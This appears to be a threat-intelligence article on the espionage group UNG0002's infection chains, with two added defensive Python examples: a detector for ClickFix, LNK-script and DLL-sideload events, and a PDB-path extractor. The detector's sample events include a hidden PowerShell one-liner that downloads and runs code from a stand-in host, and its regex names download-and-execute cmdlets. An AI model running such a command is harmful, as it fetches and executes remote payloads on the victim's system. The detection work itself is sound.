The Seqrite Labs APT-Team has uncovered the latest espionage operations of UNG0002 (Unknown Group 0002), a stealthy South-East Asian threat actor running multi-stage cyber campaigns against targets in China, Hong Kong, Pakistan, and other Asian jurisdictions. Combining targeted social engineering with custom malware implants, UNG0002 has shown adaptability and technical finesse across a string of operations tracked since 2024.
Seqrite researchers have grouped UNG0002’s activity under two major campaigns:
- Operation Cobalt Whisper (May–Sept 2024): Targeted the defense, electrotechnical engineering, and civil aviation sectors across 20 observed infection chains.
- Operation AmberMist (Jan–May 2025): Expanded to gaming, academia, and software development, and introduced new malware implants: Shadow RAT, INET RAT, and Blister DLL.
“The more recent Operation AmberMist campaign has evolved to target gaming, software development, and academic institutions with improved lightweight implants,” the report states.
UNG0002 favors complex, multi-stage infection techniques. Typical payloads are delivered using:
- Malicious LNK files (Windows shortcuts)
- VBScript, batch files, and PowerShell
- DLL sideloading via legitimate applications such as Rasphone.exe and Node-Webkit
“UNG0002 employs sophisticated infection chains using malicious LNK files, VBScript, batch scripts, and PowerShell to deploy custom RAT implants,” the report explains.
In one campaign the group used the ClickFix technique, a fake CAPTCHA verification page that persuades the victim to run an attacker-supplied PowerShell command themselves rather than relying on an exploit.
“The group utilizes fake CAPTCHA verification pages to trick victims into executing malicious PowerShell scripts, notably spoofing Pakistan’s Ministry of Maritime Affairs website,” the report states.
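As an added illustration (not code from Seqrite's report or from this article), the Python detection logic below applies the three behaviours described above to constructed Sysmon-style process-creation and image-load events: a hidden or encoded PowerShell spawned by explorer.exe (the Run dialog, as in ClickFix), a script host launched from a shortcut with a VBScript, batch or PowerShell file on its command line, and a DLL sideload by a trusted host such as rasphone.exe. The sample events, the 198.51.100.7 address, the file names, and the assumption that Node-Webkit appears on disk as nw.exe are all mine, not taken from the report.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str              # "process" (Sysmon event 1) or "imageload" (Sysmon event 7)
    image: str             # full path of the process image
    parent_image: str = ""
    cmdline: str = ""
    loaded: str = ""       # imageload only: path of the DLL mapped into the process
    signed: bool = True    # imageload only: whether the DLL carries a valid signature


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# rasphone.exe is named in the report; nw.exe is the NW.js (Node-Webkit) host binary,
# an assumption about what "Node-Webkit" resolves to on disk.
SIDELOAD_HOSTS = {"rasphone.exe", "nw.exe"}
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|bat|cmd|ps1)\b", re.I)
# Flags and cmdlets typical of a pasted ClickFix one-liner.
PS_EVASION = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\s+\S|nop\b|noprofile\b)"
    r"|\biex\b|invoke-expression|downloadstring|invoke-webrequest",
    re.I,
)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, event) pairs for every event matching one of the chains."""
    alerts = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        if ev.kind == "process":
            # ClickFix: the victim pastes the command into Win+R, so explorer.exe
            # ends up as the parent of a hidden/encoded PowerShell.
            if img in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" \
                    and PS_EVASION.search(ev.cmdline):
                alerts.append(("clickfix_run_dialog", ev))
            # Shortcut chain: a double-clicked LNK starts a script host under
            # explorer.exe with a .vbs/.bat/.ps1 file on its command line.
            elif img in SCRIPT_HOSTS and parent == "explorer.exe" \
                    and SCRIPT_EXT.search(ev.cmdline):
                alerts.append(("lnk_script_chain", ev))
        elif ev.kind == "imageload":
            # Sideloading: a trusted host binary maps a DLL that lives outside the
            # system directories or lacks a valid signature.
            dll = ev.loaded.lower()
            if img in SIDELOAD_HOSTS and (not dll.startswith(TRUSTED_DLL_DIRS) or not ev.signed):
                alerts.append(("dll_sideload", ev))
    return alerts


# Constructed sample telemetry for this example; none of it is real UNG0002 data.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          cmdline='powershell.exe -w hidden -nop -c "iex (iwr http://198.51.100.7/verify)"'),
    Event("process", r"C:\Windows\System32\wscript.exe",
          parent_image=r"C:\Windows\explorer.exe",
          cmdline=r'wscript.exe //B "C:\Users\victim\Downloads\CV_Resume\update.vbs"'),
    Event("imageload", r"C:\Users\victim\AppData\Local\Temp\Rasphone.exe",
          loaded=r"C:\Users\victim\AppData\Local\Temp\sideload.dll", signed=False),
    # Benign: the real rasphone.exe loading a signed DLL from System32.
    Event("imageload", r"C:\Windows\System32\rasphone.exe",
          loaded=r"C:\Windows\System32\rasman.dll", signed=True),
    # Benign: PowerShell started by an updater, not by explorer.exe.
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Program Files\SomeApp\updater.exe",
          cmdline="powershell.exe -NoLogo -Command Get-Date"),
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{rule}: {ev.image} {ev.cmdline or ev.loaded}")
```

The parent-process condition is what separates ClickFix from ordinary scripted PowerShell use: an explorer.exe parent with hidden-window or encoded-command flags is rare in legitimate administration. The sideload rule deliberately keys on the host binary's path rather than its name alone, because a renamed or relocated copy of a signed utility is itself a signal worth keeping in the alert.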
UNG0002 makes clever use of CV-themed decoy documents that impersonate game developers and students from elite universities. Opening them starts an infection chain that drops one of the group's custom implants:
- Shadow RAT
- INET RAT
- Blister DLL
Notably, researchers uncovered PDB (Program Database) paths embedded in the malware:
- Shadow RAT: mustang.pdb
- INET RAT: memcom.pdb
PDB paths are left behind when a developer's build environment is not scrubbed before compilation; Seqrite reads these ones as pointing to internal code names “Mustang” and “ShockWave.”
“Notable technical artifacts include PDB paths revealing development environments… indicating potential code names ‘Mustang’ and ‘ShockWave’.”
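To show how such artifacts are recovered, here is an added Python example (not from the report or this article) that scans a raw file image for CodeView RSDS records, the structure MSVC writes into a PE's debug directory, and returns the GUID, age and PDB path of each. The sample bytes are constructed: only the file name mustang.pdb comes from the report, while the directory and GUID are invented for the example.

```python
import re
import struct
import uuid

# RSDS (CodeView 7.0) record layout: 4-byte "RSDS" signature, 16-byte GUID,
# 4-byte age, then the NUL-terminated path of the .pdb that was open at link time.
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([^\x00]{1,512})\x00", re.DOTALL)


def extract_pdb_paths(data: bytes) -> list[dict]:
    """Return every CodeView RSDS record found in a raw file image."""
    hits = []
    for m in RSDS_RE.finditer(data):
        raw_guid, raw_age, raw_path = m.groups()
        hits.append({
            "offset": m.start(),
            "guid": str(uuid.UUID(bytes_le=raw_guid)),
            "age": struct.unpack("<I", raw_age)[0],
            "path": raw_path.decode("latin-1"),
        })
    return hits


def project_codename(path: str) -> str:
    """Derive a candidate code name from the .pdb file name stem."""
    stem = path.replace("\\", "/").rsplit("/", 1)[-1]
    if stem.lower().endswith(".pdb"):
        stem = stem[:-4]
    return stem


# Constructed sample, not a real UNG0002 binary: a stub MZ header, padding, one
# RSDS record, then more padding. Only "mustang.pdb" comes from the report.
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b"\x90" * 100
    + b"RSDS" + SAMPLE_GUID.bytes_le + struct.pack("<I", 3)
    + b"C:\\dev\\build\\Release\\mustang.pdb\x00"
    + b"\x00" * 32
)

if __name__ == "__main__":
    for rec in extract_pdb_paths(SAMPLE):
        print(rec, "->", project_codename(rec["path"]))
```

Signature scanning is fine for triage but can hit unrelated "RSDS" byte runs; a proper parser walks IMAGE_DIRECTORY_ENTRY_DEBUG and only decodes entries whose type is IMAGE_DEBUG_TYPE_CODEVIEW (2). The GUID and age pair is also worth recording, since the same pair recurring across samples ties them to one build of one project even when the path has changed.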
The group’s scope is wide-ranging:
- Defense & aerospace
- Electrotechnical engineering
- Energy and civil aviation
- Software development
- Gaming industry
- Academia and medical institutions
- Cybersecurity researchers
Despite its evasive tradecraft, the group reuses consistent command-and-control infrastructure and repeated naming conventions, which lets analysts link infections across campaigns.
Seqrite assesses with high confidence that UNG0002 originates from South-East Asia and that its campaigns are espionage-focused, primarily gathering intelligence across the targeted sectors.